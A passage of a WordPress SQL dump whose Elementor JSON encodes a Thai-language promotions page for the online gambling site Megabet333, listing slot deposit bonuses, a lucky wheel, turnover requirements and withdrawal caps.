\\/>\\u0e19\\u0e33\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e1b\\u0e25\\u0e38\\u0e49\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e08\\u0e30\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49 \\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e41\\u0e25\\u0e01\\u0e41\\u0e15\\u0e49\\u0e21<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e04\\u0e34\\u0e14\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e1b\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e0b\\u0e47\\u0e19\\u0e15\\u0e4c\\u0e08\\u0e32\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2a\\u0e38\\u0e17\\u0e18\\u0e34 \\u0e15\\u0e32\\u0e21\\u0e23\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e33\\u0e2b\\u0e19\\u0e14<\\/li><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e2a\\u0e14\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e19\\u0e33\\u0e44\\u0e1b\\u0e41\\u0e25\\u0e01\\u0e15\\u0e32\\u0e21\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e25\\u0e01\\u0e43\\u0e19\\u0e02\\u0e13\\u0e30\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5ce39e5\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"21cd1ab\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"6b5fc02\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lucky Wheel \\u0e01\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e42\\u0e0a\\u0e04 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a328cdd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e41\\u0e15\\u0e49\\u0e21 <strong data-start=\\\"75\\\" data-end=\\\"85\\\">Reward<\\/strong> \\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 <br \\/>\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e41\\u0e25\\u0e49\\u0e27\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e08\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19<\\/p><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"197\\\" data-end=\\\"250\\\">20 \\/ 50 \\/ 100 \\/ 150 \\/ 200 \\/ 250 \\/ 300 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a<\\/strong><\\/li><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"255\\\" data-end=\\\"275\\\">\\ud83c\\udf81 Mystery Prize<\\/strong>\\u00a0\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 (\\u0e40\\u0e0a\\u0e48\\u0e19 500 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15 <strong data-start=\\\"310\\\" data-end=\\\"318\\\">\\u0e2b\\u0e23\\u0e37\\u0e2d<\\/strong> \\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 +1)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5aae432\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(489,82,'_elementor_edit_mode','builder'),(490,82,'_elementor_template_type','wp-page'),(491,82,'_elementor_version','3.32.5'),(492,82,'_elementor_pro_version','3.32.3'),(493,82,'_wp_page_template','default'),(494,82,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(495,82,'_elementor_data','[{\"id\":\"d070aea\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4d6b9b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db612d4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 Megabet333 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aff2186\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"346\\\" data-end=\\\"760\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e34\\u0e48\\u0e07\\u0e17\\u0e35\\u0e48\\u0e14\\u0e36\\u0e07\\u0e14\\u0e39\\u0e14\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c megabet \\u0e21\\u0e32\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e01\\u0e47\\u0e04\\u0e07\\u0e2b\\u0e19\\u0e35\\u0e44\\u0e21\\u0e48\\u0e1e\\u0e49\\u0e19 \\u201c<strong>\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/strong>\\u201d \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e1b\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e01\\u0e31\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e36\\u0e07\\u0e41\\u0e02\\u0e48\\u0e07\\u0e02\\u0e31\\u0e19\\u0e01\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e14\\u0e47\\u0e14 \\u0e46 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e2d\\u0e32\\u0e43\\u0e08\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e16\\u0e49\\u0e32\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e41\\u0e08\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e40\\u0e04\\u0e22 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e43\\u0e19\\u0e1b\\u0e31\\u0e08\\u0e08\\u0e38\\u0e1a\\u0e31\\u0e19\\u0e44\\u0e21\\u0e48\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e04\\u0e23\\u0e2d\\u0e1a\\u0e04\\u0e25\\u0e38\\u0e21\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 \\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e16\\u0e2d\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e16\\u0e37\\u0e2d\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36a351d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"77587d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"f1ccc77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 20 \\u0e23\\u0e31\\u0e1a 100\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"01efd62\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 20 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 80 = \\u0e23\\u0e27\\u0e21 100 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 8 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 200<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a08 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li>\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li>\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f359e1\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"e591d78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"d853dea\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 79 \\u0e23\\u0e31\\u0e1a 200\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ea7fc2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 79 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 121 = \\u0e23\\u0e27\\u0e21 200 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 7 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 600<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a07 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"883800f\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49fe62a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fc4dc04\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"4e0d99f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e21\\u0e1a\\u0e31\\u0e2a 100%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"20cbe32\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"696\\\" data-end=\\\"711\\\">\\u0e04\\u0e38\\u0e49\\u0e21\\u0e2a\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e49\\u0e07<\\/strong> \\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/p><ul><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"743\\\" data-end=\\\"758\\\">100 \\u0e23\\u0e31\\u0e1a 200<\\/strong><\\/li><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"763\\\" data-end=\\\"780\\\">500 \\u0e23\\u0e31\\u0e1a 1,000<\\/strong><\\/li><\\/ul><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"798\\\" data-end=\\\"813\\\">\\u0e17\\u0e33 6 \\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>, <strong data-start=\\\"815\\\" data-end=\\\"835\\\">\\u0e16\\u0e2d\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"848\\\" data-end=\\\"886\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e15\\u0e31\\u0e14\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 